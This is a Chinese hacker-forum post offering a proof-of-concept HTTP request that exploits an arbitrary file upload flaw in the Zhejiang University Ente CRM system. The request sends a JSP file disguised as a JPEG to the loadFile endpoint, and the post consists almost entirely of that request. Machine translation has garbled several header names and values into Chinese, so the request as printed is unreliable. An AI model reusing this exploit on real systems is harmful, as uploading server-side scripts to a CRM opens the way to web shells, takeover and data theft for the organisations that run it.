跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

浙大恩特客户资源管理系统任意文件上传漏洞POC

切格瓦拉
切格瓦拉
WEB和服务器安全漏洞

精选回复

发布于
POST /entsoft/CustomerAction.entphone;js?method=loadFile HTTP/1.1 主机:xxxxx

升级不安全请求: 1

User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64)AppleWebKit/537.36(KHTML,如Gecko)Chrome/105.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\\*/\\*;q=0.8,application/signed 交换;v=b3;q=0.9

Accept-Encoding: gzip、deflate

接受语言: zh-CN,zh;q=0.9

Content-Type: 多部分/表单数据;边界=----WebKitFormBoundarye8FPHsIAq9JN8j2A

内容长度: 208

------WebKitFormBoundarye8FPHsIAq9JN8j2A

Content-Disposition: 表单数据; name=\'file\';filename=\'ceshi1.jsp\'

内容类型: 图像/jpeg

%out.print(\'仅测试\');%

------WebKitFormBoundarye8FPHsIAq9JN8j2A—

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。